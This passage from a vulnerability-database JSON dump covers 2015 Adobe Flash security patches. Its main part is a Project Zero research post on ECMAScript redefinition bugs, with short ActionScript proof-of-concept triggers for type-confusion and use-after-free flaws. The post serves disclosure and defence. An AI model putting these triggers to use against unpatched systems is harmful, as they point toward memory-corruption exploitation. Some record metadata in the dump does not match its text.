ColdFusion, Flex**\n\nAdobe released updates today for Flash Player, ColdFusion and Flex. The Flash update patches a vulnerability that has been exploited in the wild, Adobe said.\n\nThe [Flash update](<https://helpx.adobe.com/security/products/flash-player/apsb15-06.html>) resolves 22 security issues, including CVE-2015-3043, a remote code execution bug under attack.\n\nAffected versions are: Adobe Flash Player 17.0.0.134 and earlier versions; Adobe Flash Player 13.0.0.277 and earlier 13.x versions; Adobe Flash Player 11.2.202.451 and earlier 11.x versions.\n\nThe [ColdFusion update](<https://helpx.adobe.com/security/products/coldfusion/apsb15-07.html>), meanwhile, addresses one vulnerability, CVE-2015-0345, an input validation bug that is not under attack, Adobe said.\n\nFinally, Adobe\u2019s Flex ASdoc Tool, also patched one vulnerability, CVE-2015-1773, found in the JavaScript output of the ASDoc tool in Flex 4.6 and earlier, Adobe said.\n\n\u201cThis vulnerability could lead to reflected cross-site scripting,\u201d Adobe said in its [advisory](<https://helpx.adobe.com/security/products/flex/apsb15-08.html>).\n", "modified": "2015-04-16T14:39:33", "published": "2015-04-14T14:49:25", "id": "THREATPOST:0FAFED5DB78FA64CCE60EB40BB4C8915", "href": "https://threatpost.com/microsoft-patches-critical-http-sys-vulnerability/112251/", "type": "threatpost", "title": "April 2015 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:16", "bulletinFamily": "info", "cvelist": ["CVE-2013-0765", "CVE-2014-1705", "CVE-2014-8636", "CVE-2015-0305", "CVE-2015-0327", "CVE-2015-0349", "CVE-2015-3039", "CVE-2015-3077", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "description": "Posted by Natalie Silvanovich = function () { return n; }\n\n \n\n\nECMAScript has a property where almost all functions and variables can be dynamically redefined. This can lead to vulnerabilities in situations where native code assumes a function or variable behaves a certain way when accessed or does not have certain side effects when it can in fact be redefined. Project Zero has discovered 24 vulnerabilities involving ECMAScript redefinition in Adobe Flash in the past few months and similar issues have also been discovered in the wild. This post describes how this class of bugs works, alongside some examples of interesting bugs that have been recently patched.\n\n# ECMAScript Redefinition\n\n \n\n\nBeing a dynamically typed language, ECMAScript allows all functions to be redefined. For example, the JavaScript below redefines the alert method.\n\n \n\n\n<script>\n\nfunction f(mystring){\n\ndocument.write(mystring);\n\n}\n\nalert = f;\n\nalert(\u201chello\u201d);\n\n</script>\n\n \n\n\nIn most browsers, this will cause the function document.write to be called instead of a native alert.\n\n \n\n\nWhile this example is fairly benign, in some situations this behaviour can be problematic and lead to bugs. In particular, if native code in the VM relies on an ECMAScript method having specific behavior, but it has been redefined, it can lead to many issues, especially type confusion, overflows and use-after-frees.\n\n# Past Redefinition Bugs\n\n \n\n\nMany security bugs involving redefinition have been discovered in the past. Some of the earliest bugs were bypasses of same-origin-policy in browsers, where redefining a JavaScript function could allow script from an insecure context to be executed. Issues of this type have been found as recently as [last year](<https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636>).\n\n \n\n\nIn the past couple of years, many memory corruption and use-after-free bugs of this type have been found in browsers, such as [CVE-2013-0765](<https://www.mozilla.org/en-US/security/advisories/mfsa2013-19/>) in Firefox and [CVE-2014-1705](<https://code.google.com/p/chromium/issues/detail?id=351787>) in Chrome.\n\n \n\n\nThe recent HackingTeam leak contained five Adobe Flash vulnerabilities, of which four involved redefinition ([CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472&can=1&q=reporter%3Ame>), CVE-2015-5122, CVE-2015-5123 and [CVE-2015-0349](<http://www.zerodayinitiative.com/advisories/ZDI-15-134/>)). An analysis of CVE-2015-5119 is included below\n\n \n\n\nHow to Redefine an Object\n\n \n\n\nOne of the main challenges in finding and exploiting redefinition vulnerabilities is reachability. Many of these issues exist deep in code, and it is not always obvious how to trigger them. Moreover, not all ECMA-based languages support redefinition to the same degree, and it often varies based on the specific function and method being redefined. That said, ECMAScript supports many methods of gaining access to objects, so it is often possible to reach redefinition using less-used ECMAScript functionality.\n\n# Equality Operator\n\n \n\n\nThe equality operator is the simplest way to redefine an object or function and it works to some extent in most ECMAScript implementations. In ActionScript 2, it works without restriction so long as a field doesn\u2019t have a setter defined (although sometimes the code doesn\u2019t compile and needs to be written directly in bytecode). Even read-only properties in AS2 can be redefined with the equality operator by calling ASSetProps to remove the read-only flag first. In ActionScript 3, only classes that are declared as dynamic can have their methods redefined using equality. In browsers, most methods can be redefined using equality, although one host function cannot be set to another host function directly. For example, in the code at the beginning of this post, alert can be set to document.write, but it needs to wrapped in the function f first. Direct assignment will cause the script to fail to execute.\n\n## CVE-2015-3077\n\n \n\n\n[CVE-2015-3077](<https://code.google.com/p/google-security-research/issues/detail?id=254>) is an example of a vulnerability in Flash that occurs because a function can be redefined using equality. A sample of the code that causes the issue is below. Note that this code has been simplified for clarity, and does not compile. A compiling sample of the code can be found in the Project Zero [bug tracker](<https://code.google.com/p/google-security-research/issues/detail?id=254&q=button>). \n\n \n\n\nvar blur = new flash.filters.BlurFilter(100, 15, 5555);\n\nthis.filters = [blur]; //this is a Button\n\nflash.filters.BlurFilter = flash.filters.ConvolutionFilter;\n\nvar f = this.filters;\n\nvar conv = f[0];\n\nconv.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];\n\n \n\n\nThis is a simple type confusion issue. When the Button.filters method is set, it creates a native array containing all the filters and stores it. When the Button.filters property is read, it creates ActionScript objects of the type of each filter by calling its ActionScript constructor (with the assumption it hasn\u2019t been redefined) and then setting its native backing object to the one stored in the array. If the constructor for a filter is redefined, it calls the constructor for the wrong filter type, but still sets the same native object. This leads to an AS object of one type being backed by a native object of another type, leading to type confusion.\n\n## CVE-2015-0305\n\n \n\n\n[CVE-2015-0305](<https://code.google.com/p/google-security-research/issues/detail?id=150>) is another example of a type confusion issue that occurs through redefinition via equality. \n\n \n\n\nvar b = flash.net;\n\nb.FileReference = q;\n\nfunction q(){\n\nthis.f = flash.display.BitmapData\n\nvar c = new this.f(1000, 1000, true, 1000)\n\n}\n\nvar file = new FileReferenceList();\n\n\u2026\n\nfile.browse();\n\n \n\n\nIt is fairly similar to the previous case. When FileReferenceList.browse is called, the browser spawns a dialog and the user selects files. Then, for each file, the browse method calls the FileReference constructor and creates an object for each file. In this bug, the constructor is overwritten with a constructor that initializes it as a BitmapData object. When the constructor is called, its type is set to FileReference, even though it is not the type that is returned. This leads to an object with an AS object type and native object type that are inconsistent, and therefore type confusion. The bug is that FileReferenceList.browse assumes the FileReference constructor will return a FileReference, even though this isn\u2019t guaranteed because the method can be redefined.\n\n# Proxy Objects\n\n \n\n\nProxy objects can be used in the place of regular objects. They allow functions that handle every property access and method call to be defined. They can sometimes be used to redefine a property where equality fails. They also have the benefit of being able to execute code every time a property is accessed, which can allow behaviour which isn\u2019t possibly when simply setting a property, such as returning a different value each time a property is accessed. ActionScript 3 and JavaScript support Proxy objects.\n\n## CVE-2015-0327\n\n \n\n\n[CVE-2015-0327](<https://code.google.com/p/google-security-research/issues/detail?id=223&can=1&q=stringify>) is an issue found by Ian Beer that can be triggered by calling the stringify method in AS3 on a Proxy object. \n\n \n\n\nwhile (index != 0) {\n\nownDynPropCount++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nAutoDestructingAtomArray propNames(m_fixedmalloc, ownDynPropCount);\n\n\u2026 \n\nwhile (index != 0) {\n\nAtom name = value->nextName(index);\n\npropNames.m_atoms[propNamesIdx] = name;\n\npropNamesIdx++;\n\nindex = value->nextNameIndex(index);\n\n}\n\n \n\n\nThe code above is from the open-source AVM. It counts the elements in value, and then uses the length to allocate an array. The array is then set by enumerating the items in value. However, if value is a Proxy object, the number of elements in each enumeration is not necessarily consistent, which can lead to an overflow in the allocated buffer.\n\n# Conversion Operators\n\n \n\n\nConversion operators, such as toString, valueOf and toInt can often be called implicitly. For example, when calling a native method such as:\n\n \n\n\nvar b = new BitmapData(x, y, true, 0xff00ff);\n\n \n\n\nThis will usually call valueOf on x and y to convert them to integers if they are not already. Functions that take string input often display similar behavior with toString. This can be an avenue for executing scripts at unexpected times. Conversion operators can be redefined in both AS2 and AS3.\n\n## CVE-2015-3039\n\n \n\n\n[CVE-2015-3039](<https://code.google.com/p/google-security-research/issues/detail?id=244>) is a bug in AS2 where calls to conversion operator allows script to be executed unexpectedly during a native call.\n\n \n\n\nvar filter = new ConvolutionFilter(...);\n\nvar n = {};\n\nn.valueOf = ts;\n\nvar a = [];\n\nfor(var k = 0; k < 1; k++){\n\na[k] = n;\n\n}\n\nfilter.matrix = a;\n\nfunction ts(){\n\nfilter.matrix = a;\n\n}\n\n \n\n\nWhen the native matrix getter is called, it first deletes the existing matrix, then reallocates a new one and then sets its contents to the values in the provided matrix. When it fetches the values from the matrix, it calls valueOf to convert the contents of the array to members of the Number class. However, if the valueOf function also calls the matrix getter, it will delete the matrix array, and reallocate it, even though the previous call isn\u2019t complete, and will write to it after the second call returns. This leads to a use-after-free bug. \n\n \n\n\nCVE-2015-5119\n\n \n\n\n[CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472>) is a bug discovered in the HackingTeam leaks which occurs because calls to a conversion operator can cause a buffer to be freed and reallocated before a write to the original buffer.\n\n \n\n\nvar b = new ByteArray();\n\nb.length = 12;\n\nvar n = new myba(b);\n\nb[0] = n;\n\n \n\n\nIn the myba class definition:\n\n \n\n\nprototype.valueOf = function()\n\n{\n\nb.length = 1000;\n\n}\n\n \n\n\nThis bug is in the AS3 interpreter unlike the AS2 interpreter for the issue above, so valueOf has to be redefined in a class definition as shown. The vulnerable code is part of the open source AVM, and is as follows:\n\n \n\n\nvoid ByteArrayObject::setUintProperty(uint32_t i, Atom value)\n\n{\n\nm_byteArray[i] = uint8_t(AvmCore::integer(value));\n\n}\n\n \n\n\nThe AvmCore::integer method calls the valueOf method defined for the object value, which corresponds to the variable n in the ActionScript above. This can then set the length of the byte array, which can cause it to be reallocated. However, the write occurs on the original buffer, leading to a use-after-free.\n\n# Watches\n\n \n\n\nWatches are another method that can be used to change a property of an object. They are supported generically in AS2 and JavaScript. Watches trigger whenever an object property without a custom setter is set. This can sometimes mean that when a native method sets a property, a watch will trigger, allowing a jump into script, and also the ability to change what the property is set to, as a watcher can return a value which supersedes the value that the caller is trying to set the watched field to.\n\n## CVE-2015-3120\n\n \n\n\n[CVE-2015-3120](<https://code.google.com/p/google-security-research/issues/detail?id=337>) is a type confusion issue that can be reached by setting a watch on a variable.\n\n \n\n\nvar fileRef:FileReferenceList = new FileReferenceList();\n\nfileRef.addListener(listener);\n\nfileRef[\"fileList\"] = \"asdf\";\n\nfileRef.watch(\"fileList\", func);\n\nfileRef.browse(allTypes);\n\n \n\n\nfunction func(){\n\nreturn 7777777;\n\n}\n\n \n\n\nSetting a watch on the variable fileList causes the function func to be triggered when the native browse function creates the fileList object and attempts to set it. The function then returns the value 7777777, which is a Number, replacing the object that is set. This leads to type confusion when the variable is used, assumed to be an ActionScript object and used as a pointer as opposed to a Number.\n\n## CVE-2015-3119\n\n \n\n\n[CVE-2015-3119](<https://code.google.com/p/google-security-research/issues/detail?id=336>) is a bug in AS2 that can be triggered by setting a watch on a variable:\n\n \n\n\nclass mysubclass extends NetConnection {\n\nfunction mysubclass(a){\n\nthis.uri = \"test\";\n\nsuper();\n\nthis.watch(\"uri\", func);\n\nvar n = {toString : func}\n\nvar s = super;\n\ntrace(y);\n\nthis.connect(y);\n\nvar f = ASnative(2101, 411); //setBufferTimeMax\n\nf.call(this, 1000);\n\nfunction func(a, b, c){\n\nvar f = ASnative(2101, 200); // newStream\n\nvar n = new NetConnection();\n\nn.connect(y);\n\nf(this, n);\n\n}\n\n}\n\n}\n\n \n\n\nA watch is set on the URL property of a NetConnection object, and when it attempts to set the URL, the function func is called. This function redefines the this object as a NetStream (as opposed to a NetConnection), which leads to type confusion. The watch makes this possible, as it occurs after type checking, otherwise the function would fail to execute if called as a NetStream.\n\n# Subclassing\n\n \n\n\nSometimes it is possible to redefine a method or property of a class by subclassing it, if you control the construction of the object. Classes in ActionScript and JavaScript can be subclassed using the extends keyword. In addition, classes can sometimes be dynamically extended using the __proto__ or prototype keyword.\n\n# Resolution Methods\n\n \n\n\nJavaScript and AS2 objects also support resolution methods. These are methods are called when resolution of a property or method fails, as a last resort. In ActionScript 2, __resolve is a resolution function that gets called if resolution of a property or method fails. In JavaScript, there are a series of __lookUp*__ methods, such as __lookUpGetter__ which serve the same purpose (the specific method that get calls depends exactly on what type of resolution fails). These functions can be used to redefine methods or properties to reach bugs, but are also useful in finding bugs. Calling a native method on an object with a resolution method set is a good way to figure out what properties of the object the method is accessing, which can then be modified further\n\n# Conclusion\n\nRedefining host methods and properties can often violate the assumptions made by ECMAScript VMs when they access them. This is a good avenue for finding bugs in this type of software. \n\n \n\n", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806", "href": "https://googleprojectzero.blogspot.com/2015/08/attacking-ecmascript-engines-with.html", "type": "googleprojectzero", "title": "\nAttacking ECMAScript Engines with Redefinition\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "Buffer overflows, memory corruptions, integer overflows, race conditions, restriction bypass.", "edition": 1, "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "id": "SECURITYVULNS:VULN:14490", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14490", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

Adobe AIR for Mac &lt;= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)

Description

Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)